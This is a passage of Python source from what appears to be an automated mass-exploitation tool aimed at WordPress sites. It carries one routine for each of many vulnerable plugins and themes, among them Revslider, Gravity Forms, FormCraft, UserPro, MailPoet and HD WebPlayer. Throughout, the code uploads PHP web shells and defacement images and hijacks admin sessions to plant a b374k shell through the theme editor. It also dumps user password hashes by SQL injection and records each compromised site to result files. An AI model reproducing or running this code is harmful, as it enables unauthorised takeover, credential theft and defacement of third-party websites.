1219. GoT = requests.get('http://' + site + Ex, timeout=5)
1220. if 'GIF89a' in GoT.text.encode('utf-8'):
1221. requests.get('http://' + site + ExploitGifUpload)
1222. requests.get('http://' + site + ExploitShell)
1223. PathGif = '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif'
1224. PathShell = '/wp-content/plugins/wp-mobile-detector/cache/settings_auto.php'
1225. Check1 = 'http://' + site + PathGif
1226. Check2 = 'http://' + site + PathShell
1227. CheckIndex = requests.get(Check1, timeout=5)
1228. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1229. CheckShell = requests.get(Check2, timeout=5)
1230. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1231. Xshell = requests.get("http://" + site + "/wp-content/vuln.php", timeout=5)
1232. if 'Vuln!!' in Xshell.text.encode('utf-8'):
1233. self.Print_vuln_Shell(site + "/wp-content/vuln.php")
1234. with open('result/Shell_results.txt', 'a') as writer:
1235. writer.write(site + "/wp-content/vuln.php" + '\n')
1236. Xindex = requests.get("http://" + site + "/vuln.htm", timeout=5)
1237. if 'Vuln!!' in Xindex.text.encode('utf-8'):
1238. self.Print_Vuln_index(site + '/vuln.htm')
1239. with open('result/Index_results.txt', 'a') as writer:
1240. writer.write(site + '/vuln.htm' + '\n')
1241. else:
1242. self.Print_Vuln_index(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif')
1243. with open('result/Index_results.txt', 'a') as writer:
1244. writer.write(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif' + '\n')
1245. else:
1246. self.Print_NotVuln('wp-mobile-detector', site)
1247. else:
1248. self.Print_NotVuln('wp-mobile-detector', site)
1249. except:
1250. self.Print_NotVuln('wp-mobile-detector', site)
1251.  
1252. def get_WpNoncE(self, source):
1253. try:
1254. find = re.findall('<input type="hidden" id="_wpnonce" name="_wpnonce" value="(.*?)"', source)
1255. path = find[0].strip()
1256. return path
1257. except:
1258. pass
1259.  
1260. def get_WpFlag(self, source):
1261. try:
1262. find = re.findall('<option value="(.*?)" selected="selected">', source)
1263. path = find[0].strip()
1264. return path
1265. except:
1266. pass
1267.  
1268. def UserProExploit(self, site):
1269. try:
1270. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
1271. 'Accept': '*/*'}
1272. exploit = '/?up_auto_log=true'
1273. sess = requests.session()
1274. admin_re_page = 'http://' + site + '/wp-admin/'
1275. sess.get('http://' + site + exploit, timeout=10, headers=headers)
1276. Check_login = sess.get(admin_re_page, timeout=10, headers=headers)
1277. if '<li id="wp-admin-bar-logout">' in Check_login.text:
1278. with open('result/AdminTakeover_results.txt', 'a') as writer:
1279. writer.write(site + exploit + '\n')
1280. ___Get_editor = admin_re_page + 'theme-editor.php?file=search.php#template'
1281. ___Get_edit = admin_re_page + 'theme-editor.php'
1282. Get_source = sess.get(___Get_editor, headers=headers, timeout=5)
1283. source = Get_source.text
1284. _Wp_FlaG = self.get_WpFlag(source)
1285. _Wp_NoncE = self.get_WpNoncE(source)
1286. __data = {'_wpnonce': _Wp_NoncE,
1287. '_wp_http_referer': '/wp-admin/theme-editor.php?file=search.php',
1288. 'newcontent': self.shell_code,
1289. 'action': 'update',
1290. 'file': 'search.php',
1291. 'theme': _Wp_FlaG,
1292. 'scrollto': '0',
1293. 'docs-list': '',
1294. 'submit': 'Update+File'}
1295. sess.post(___Get_edit, data=__data, headers=headers)
1296. shell_PaTh = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + "/search.php"
1297. Check_sHell = sess.get(shell_PaTh, headers=headers)
1298. if 'wordpress_project' in Check_sHell.text:
1299. __po = {'_upl': 'Upload'}
1300. fil = {'file': open('Access.php', 'rb')}
1301. requests.post(shell_PaTh, data=__po, files=fil)
1302. shell_PaTh_DoNe = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + '/Access.php'
1303. Got_Shell = requests.get(shell_PaTh_DoNe, timeout=5)
1304. if 'b374k' in Got_Shell.text:
1305. self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php")
1306. with open('result/Shell_results.txt', 'a') as writer:
1307. writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php" + '\n')
1308. else:
1309. self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php")
1310. with open('result/Shell_results.txt', 'a') as writer:
1311. writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php" + '\n')
1312. else:
1313. self.Print_NotVuln('UserPro', site)
1314. else:
1315. self.Print_NotVuln('UserPro', site)
1316. except:
1317. self.Print_NotVuln('UserPro', site)
1318.  
1319.  
1320. def formcraftExploit_Shell(self, site):
1321. try:
1322. ShellFile = {'files[]': open(self.pagelinesExploitShell, 'rb')}
1323. Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
1324. Check = requests.get(Exp, timeout=5)
1325. if '"failed"' in Check.text.encode('utf-8'):
1326. GoT = requests.post(Exp, files=ShellFile, timeout=5)
1327. if 'new_name' in GoT.text.encode('utf-8'):
1328. GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
1329. IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
1330. + GetIndexName[0].split('"')[0]
1331. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
1332. if CheckIndex.status_code == 200:
1333. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1334. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1335. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1336. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1337. with open('result/Shell_results.txt', 'a') as writer:
1338. writer.write(site + '/wp-content/vuln.php' + '\n')
1339. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1340. self.Print_Vuln_index(site + '/vuln.htm')
1341. with open('result/Index_results.txt', 'a') as writer:
1342. writer.write(site + '/vuln.htm' + '\n')
1343. else:
1344. self.formcraftExploitIndeX(site)
1345. else:
1346. self.formcraftExploitIndeX(site)
1347. else:
1348. self.formcraftExploitIndeX(site)
1349. else:
1350. self.formcraftExploitIndeX(site)
1351. except:
1352. self.formcraftExploitIndeX(site)
1353.  
1354. def formcraftExploitIndeX(self, site):
1355. try:
1356. ShellFile = {'files[]': open(self.Jce_Deface_image, 'rb')}
1357. Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
1358. Check = requests.get(Exp, timeout=5)
1359. if '"failed"' in Check.text.encode('utf-8'):
1360. GoT = requests.post(Exp, files=ShellFile, timeout=5)
1361. if 'new_name' in GoT.text.encode('utf-8'):
1362. GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
1363. IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
1364. + GetIndexName[0].split('"')[0]
1365. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
1366. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1367. self.Print_Vuln_index(IndexPath)
1368. with open('result/Index_results.txt', 'a') as writer:
1369. writer.write(IndexPath + '\n')
1370. else:
1371. self.Print_NotVuln('formcraft', site)
1372. else:
1373. self.Print_NotVuln('formcraft', site)
1374. else:
1375. self.Print_NotVuln('formcraft', site)
1376. except:
1377. self.Print_NotVuln('formcraft', site)
1378.  
1379.  
1380.  
1381. def cherry_plugin(self, site):
1382. try:
1383. ShellFile = {'file': (self.pagelinesExploitShell, open(self.pagelinesExploitShell, 'rb')
1384. , 'multipart/form-data')}
1385. Exp = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'
1386. aa = requests.post(Exp, files=ShellFile, timeout=5)
1387. Shell = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/' \
1388. + self.pagelinesExploitShell.split('/')[1]
1389. GoT = requests.get(Shell, timeout=5)
1390. if GoT.status_code == 200:
1391. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1392. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1393. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1394. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1395. with open('result/Shell_results.txt', 'a') as writer:
1396. writer.write(site + '/wp-content/vuln.php' + '\n')
1397. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1398. self.Print_Vuln_index(site + '/vuln.htm')
1399. with open('result/Index_results.txt', 'a') as writer:
1400. writer.write(site + '/vuln.htm' + '\n')
1401. else:
1402. self.Print_NotVuln('cherry plugin', site)
1403. else:
1404. self.Print_NotVuln('cherry plugin', site)
1405. except:
1406. self.Print_NotVuln('cherry plugin', site)
1407.  
1408. def addblockblocker(self, site):
1409. try:
1410. ShellFile = {'popimg': open(self.pagelinesExploitShell, 'rb')}
1411. Exp = 'http://' + site + '/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
1412. requests.post(Exp, files=ShellFile, timeout=5)
1413. CheckShell = 'http://' + site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/' \
1414. + self.pagelinesExploitShell.split('/')[1]
1415. GoT = requests.get(CheckShell, timeout=5)
1416. if GoT.status_code == 200:
1417. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1418. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1419. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1420. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1421. with open('result/Shell_results.txt', 'a') as writer:
1422. writer.write(site + '/wp-content/vuln.php' + '\n')
1423. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1424. self.Print_Vuln_index(site + '/vuln.htm')
1425. with open('result/Index_results.txt', 'a') as writer:
1426. writer.write(site + '/vuln.htm' + '\n')
1427. else:
1428. self.Print_NotVuln('Adblock Blocker', site)
1429. else:
1430. self.Print_NotVuln('Adblock Blocker', site)
1431. except:
1432. self.Print_NotVuln('Adblock Blocker', site)
1433.  
1434. def HeadWayThemeExploit(self, site):
1435. try:
1436. CheckTheme = requests.get('http://' + site, timeout=5)
1437. if '/wp-content/themes/headway' in CheckTheme.text.encode('utf-8'):
1438. ThemePath = re.findall('/wp-content/themes/(.*)/style.css', CheckTheme.text.encode('utf-8'))
1439. ShellFile = {'Filedata': open(self.pagelinesExploitShell, 'rb')}
1440. useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1441.  
1442. url = "http://" + site + "/wp-content/themes/" + ThemePath[0] +\
1443. "/library/visual-editor/lib/upload-header.php"
1444. Check = requests.get(url, timeout=5)
1445. if Check.status_code == 200:
1446. GoT = requests.post(url, files=ShellFile, headers=useragent)
1447. if GoT.status_code == 200:
1448. Shell_URL = 'http://' + site + '/wp-content/uploads/headway/header-uploads/' +\
1449. self.pagelinesExploitShell.split('/')[1]
1450. requests.get(Shell_URL, timeout=5)
1451. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1452. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1453. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1454. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1455. with open('result/Shell_results.txt', 'a') as writer:
1456. writer.write(site + '/wp-content/vuln.php' + '\n')
1457. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1458. self.Print_Vuln_index(site + '/vuln.htm')
1459. with open('result/Index_results.txt', 'a') as writer:
1460. writer.write(site + '/vuln.htm' + '\n')
1461. else:
1462. self.Print_NotVuln('Headway Theme', site)
1463. else:
1464. self.Print_NotVuln('Headway Theme', site)
1465. else:
1466. self.Print_NotVuln('Headway Theme', site)
1467. else:
1468. self.Print_NotVuln('Headway Theme', site)
1469. except:
1470. self.Print_NotVuln('Headway Theme', site)
1471.  
1472.  
1473. def pagelinesExploit(self, site):
1474. try:
1475. FileShell = {'file': open(self.pagelinesExploitShell, 'rb')}
1476. PostData = {'settings_upload': "settings", 'page': "pagelines"}
1477. Useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1478. url = "http://" + site + "/wp-admin/admin-post.php"
1479. GoT = requests.post(url, files=FileShell, data=PostData, headers=Useragent, timeout=5)
1480. if GoT.status_code == 200:
1481. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1482. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1483. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1484. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1485. with open('result/Shell_results.txt', 'a') as writer:
1486. writer.write(site + '/wp-content/vuln.php' + '\n')
1487. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1488. self.Print_Vuln_index(site + '/vuln.htm')
1489. with open('result/Index_results.txt', 'a') as writer:
1490. writer.write(site + '/vuln.htm' + '\n')
1491. else:
1492. self.Print_NotVuln('Pagelines', site)
1493. else:
1494. self.Print_NotVuln('Pagelines', site)
1495. except:
1496. self.Print_NotVuln('Pagelines', site)
1497.  
1498.  
1499. def wysijaExploit(self, site):
1500. try:
1501. FileShell = {'my-theme': open(self.MailPoetZipShell, 'rb')}
1502. PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on",
1503. 'page': 'GZNeFLoZAb'}
1504. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1505. url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
1506. GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
1507. if 'page=wysija_campaigns&amp;action=themes&amp;reload=1' in GoT.text.encode('utf-8'):
1508. sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php'
1509. index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif'
1510. CheckShell = requests.get(sh, timeout=5)
1511. CheckIndex = requests.get(index, timeout=5)
1512. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1513. self.Print_vuln_Shell(site + '/wp-content/uploads/wysija/themes/rock/vuln.php')
1514. with open('result/Shell_results.txt', 'a') as writer:
1515. writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n')
1516. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1517. self.Print_Vuln_index(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif')
1518. with open('result/Index_results.txt', 'a') as writer:
1519. writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n')
1520. else:
1521. self.Print_NotVuln('wysija', site)
1522. else:
1523. self.Print_NotVuln('wysija', site)
1524. except:
1525. self.Print_NotVuln('wysija', site)
1526.  
1527.  
1528.  
1529. def HD_WebPlayerSqli(self, site):
1530. try:
1531. check = requests.get('http://' + site + '/wp-content/plugins/hd-webplayer/playlist.php', timeout=5)
1532. if '<?xml version="' in check.text.encode('utf-8'):
1533. Exploit = '/wp-content/plugins/hd-webplayer/playlist.php' \
1534. '?videoid=1+union+select+1,2,concat(user_login,0x3a,user_pass)' \
1535. ',4,5,6,7,8,9,10,11+from+wp_users--'
1536. GoT = requests.get('http://' + site + Exploit, timeout=5)
1537. User_Pass = re.findall('<title>(.*)</title>', GoT.text.encode('utf-8'))
1538. username = User_Pass[1].split(':')[0]
1539. password = User_Pass[1].split(':')[1]
1540. self.Print_Vuln('HD-Webplayer', site)
1541. self.Print_Username_Password(username, password)
1542. with open('result/Sqli_result.txt', 'a') as writer:
1543. writer.write('------------------------------' + '\n' + 'Domain: ' + site + '\n' +
1544. 'Username : ' + username + '\n' + 'Password : ' + password + '\n')
1545. else:
1546. self.Print_NotVuln('HD-Webplayer', site)
1547. except:
1548. self.Print_NotVuln('HD-Webplayer', site)
1549.  
1550.  
1551. def Gravity_Forms_Shell(self, site):
1552. try:
1553. Grav_checker = requests.get('http://' + site + '/?gf_page=upload', timeout=5)
1554. if '"status" : "error"' in Grav_checker.text.encode('utf-8'):
1555. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1556. fileDeface = {'file': open(self.gravShell, 'rb')}
1557. post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'css.php5'}
1558. try:
1559. url = "http://" + site + '/?gf_page=upload'
1560. GoT = requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
1561. if '.php5' in GoT.text.encode('utf-8'):
1562. CheckShell = requests.get('http://' + site + '/wp-content/_input_3_css.php5', timeout=5)
1563. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1564. Checkshell2 = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1565. if 'Vuln!!' in Checkshell2.text.encode('utf-8'):
1566. Checkshell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1567. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1568. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
1569. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1570. with open('result/Shell_results.txt', 'a') as writer:
1571. writer.write(site + '/wp-content/vuln.php' + '\n')
1572. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1573. self.Print_Vuln_index(site + '/vuln.htm')
1574. with open('result/Index_results.txt', 'a') as writer:
1575. writer.write(site + '/vuln.htm' + '\n')
1576. else:
1577. self.Gravity_forms_Index(site)
1578. else:
1579. self.Gravity_forms_Index(site)
1580. else:
1581. self.Gravity_forms_Index(site)
1582. else:
1583. self.Gravity_forms_Index(site)
1584. except Exception, e:
1585. self.Print_NotVuln('Gravity-Forms', site)
1586. else:
1587. self.Print_NotVuln('Gravity Forms', site)
1588. except:
1589. self.Timeout(site)
1590.  
1591.  
1592. def Gravity_forms_Index(self, site):
1593. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1594. fileDeface = {'file': open(self.Jce_Deface_image, 'rb')}
1595. post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'pwn.gif'}
1596. post_data2 = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../../', 'name': 'pwn.gif'}
1597. try:
1598. url = "http://" + site + '/?gf_page=upload'
1599. requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
1600. requests.post(url, files=fileDeface, data=post_data2, headers=UserAgent, timeout=5)
1601. CheckIndex = requests.get('http://' + site + '/_input_3_pwn.gif', timeout=5)
1602. CheckIndex2 = requests.get('http://' + site + '/wp-content/_input_3_pwn.gif', timeout=5)
1603. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1604. self.Print_Vuln_index(site + '/_input_3_pwn.gif')
1605. with open('result/Index_results.txt', 'a') as writer:
1606. writer.write(site + '/_input_3_pwn.gif' + '\n')
1607. elif 'GIF89a' in CheckIndex2.text.encode('utf-8'):
1608. self.Print_Vuln_index(site + '/wp-content/_input_3_pwn.gif')
1609. with open('result/Index_results.txt', 'a') as writer:
1610. writer.write(site + '/wp-content/_input_3_pwn.gif' + '\n')
1611. else:
1612. self.Print_NotVuln('Gravity-Forms', site)
1613. except Exception, e:
1614. self.Print_NotVuln('Gravity-Forms', site)
1615.  
1616. def WP_User_Frontend(self, site):
1617. try:
1618. CheckVuln = requests.get('http://' + site + '/wp-admin/admin-ajax.php?action=wpuf_file_upload', timeout=5)
1619. if 'error' in CheckVuln.text or CheckVuln.status_code == 200:
1620. post = {}
1621. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1622. post['action'] = 'wpuf_file_upload'
1623. files = {'wpuf_file': open(self.Jce_Deface_image, 'rb')}
1624. try:
1625. _url = 'http://' + site + "/wp-admin/admin-ajax.php"
1626. _open = requests.post(_url, files=files, data=post, headers=UserAgent, timeout=10)
1627. if 'image][]' in _open.text.encode('utf-8'):
1628. _Def = site + "/wp-content/uploads/20" + self.year + "/" + self.month + "/" + self.Jce_Deface_image.split('/')[1]
1629. Check_Deface = requests.get('http://' + _Def, timeout=5)
1630. if 'GIF89a' in Check_Deface.text.encode('utf-8'):
1631. self.Print_Vuln_index(_Def)
1632. with open('result/Index_results.txt', 'a') as writer:
1633. writer.write(_Def + '\n')
1634. else:
1635. self.Print_NotVuln('WP-User-Frontend', site)
1636. else:
1637. self.Print_NotVuln('WP-User-Frontend', site)
1638. except:
1639. self.Print_NotVuln('WP-User-Frontend', site)
1640. else:
1641. self.Print_NotVuln('WP-User-Frontend', site)
1642. except:
1643. self.Print_NotVuln('WP-User-Frontend', site)
1644.  
1645.  
1646. def Revslider_css(self, site):
1647. IndeXText = 'Vuln!! Patch it Now!'
1648. ency = {'action': "revslider_ajax_action",
1649. 'client_action': "update_captions_css",
1650. 'data': "<body style='color: transparent;background-color: black'><center><h1>"
1651. "<b style='color: white'>" + IndeXText + "<p style='color: transparent'>",
1652.  
1653. }
1654. try:
1655. url = "http://" + site + "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"
1656. aa = requests.post(url, data=ency, timeout=5)
1657. if 'succesfully' in aa.text.encode('utf-8'):
1658. deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'
1659. self.Print_Vuln_index(deface)
1660. with open('result/Index_results.txt', 'a') as writer:
1661. writer.write(deface + '\n')
1662. else:
1663. self.Print_NotVuln('Revslider', site)
1664. except:
1665. self.Print_NotVuln('Revslider', site)
1666.  
1667. def Revslider_SHELL(self, site):
1668. try:
1669. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1670. Exploit = 'http://' + site + '/wp-admin/admin-ajax.php'
1671. data = {'action': "revslider_ajax_action", 'client_action': "update_plugin"}
1672. FileShell = {'update_file': open(self.MailPoetZipShell, 'rb')}
1673. CheckRevslider = requests.get('http://' + site, timeout=5)
1674. if '/wp-content/plugins/revslider/' in CheckRevslider.text.encode('utf-8'):
1675. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1676. CheckRev = requests.get('http://' + site +
1677. '/wp-content/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1678. if 'GIF89a' in CheckRev.text.encode('utf-8'):
1679. ShellCheck = requests.get('http://' + site +
1680. '/wp-content/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1681. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1682. self.Print_vuln_Shell(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php')
1683. with open('result/Shell_results.txt', 'a') as writer:
1684. writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1685. self.Print_Vuln_index(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif')
1686. with open('result/Index_results.txt', 'a') as writer:
1687. writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1688. self.Revslider_Config(site)
1689. else:
1690. self.Revslider_Config(site)
1691. elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
1692. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1693. CheckRev1 = requests.get('http://' + site +
1694. '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1695. if 'GIF89a' in CheckRev1.text.encode('utf-8'):
1696. ShellCheck = requests.get('http://' + site +
1697. '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1698. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1699. self.Print_vuln_Shell(
1700. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php')
1701. with open('result/Shell_results.txt', 'a') as writer:
1702. writer.write(
1703. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1704. self.Print_Vuln_index(
1705. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif')
1706. with open('result/Index_results.txt', 'a') as writer:
1707. writer.write(
1708. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1709. self.Revslider_Config(site)
1710. else:
1711. self.Revslider_Config(site)
1712. elif '/wp-content/themes/striking_r/' in CheckRevslider.text.encode('utf-8'):
1713. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1714. CheckRev2 = requests.get('http://' + site +
1715. '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1716. if 'GIF89a' in CheckRev2.text.encode('utf-8'):
1717. ShellCheck = requests.get('http://' + site +
1718. '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1719. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1720. self.Print_vuln_Shell(
1721. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php')
1722. with open('result/Shell_results.txt', 'a') as writer:
1723. writer.write(
1724. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1725. self.Print_Vuln_index(
1726. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif')
1727. with open('result/Index_results.txt', 'a') as writer:
1728. writer.write(
1729. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1730. self.Revslider_Config(site)
1731. else:
1732. self.Revslider_Config(site)
1733. elif '/wp-content/themes/IncredibleWP/' in CheckRevslider.text.encode('utf-8'):
1734. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1735. CheckRev3 = requests.get('http://' + site +
1736. '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1737. if 'GIF89a' in CheckRev3.text.encode('utf-8'):
1738. ShellCheck = requests.get('http://' + site +
1739. '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1740. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1741. self.Print_vuln_Shell(
1742. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php')
1743. with open('result/Shell_results.txt', 'a') as writer:
1744. writer.write(
1745. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1746. self.Print_Vuln_index(
1747. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif')
1748. with open('result/Index_results.txt', 'a') as writer:
1749. writer.write(
1750. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1751. self.Revslider_Config(site)
1752. else:
1753. self.Revslider_Config(site)
1754. elif '/wp-content/themes/ultimatum/' in CheckRevslider.text.encode('utf-8'):
1755. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1756. CheckRev4 = requests.get('http://' + site +
1757. '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1758. if 'GIF89a' in CheckRev4.text.encode('utf-8'):
1759. ShellCheck = requests.get('http://' + site +
1760. '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1761. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1762. self.Print_vuln_Shell(
1763. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php')
1764. with open('result/Shell_results.txt', 'a') as writer:
1765. writer.write(
1766. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1767. self.Print_Vuln_index(
1768. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif')
1769. with open('result/Index_results.txt', 'a') as writer:
1770. writer.write(
1771. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1772. self.Revslider_Config(site)
1773. else:
1774. self.Revslider_Config(site)
1775. elif '/wp-content/themes/medicate/' in CheckRevslider.text.encode('utf-8'):
1776. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1777. CheckRev5 = requests.get('http://' + site +
1778. '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif', timeout=5)
1779. if 'GIF89a' in CheckRev5.text.encode('utf-8'):
1780. ShellCheck = requests.get('http://' + site +
1781. '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php', timeout=5)
1782. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1783. self.Print_vuln_Shell(
1784. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php')
1785. with open('result/Shell_results.txt', 'a') as writer:
1786. writer.write(
1787. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php' + '\n')
1788. self.Print_Vuln_index(
1789. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif')
1790. with open('result/Index_results.txt', 'a') as writer:
1791. writer.write(
1792. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif' + '\n')
1793. self.Revslider_Config(site)
1794. else:
1795. self.Revslider_Config(site)
1796. elif '/wp-content/themes/centum/' in CheckRevslider.text.encode('utf-8'):
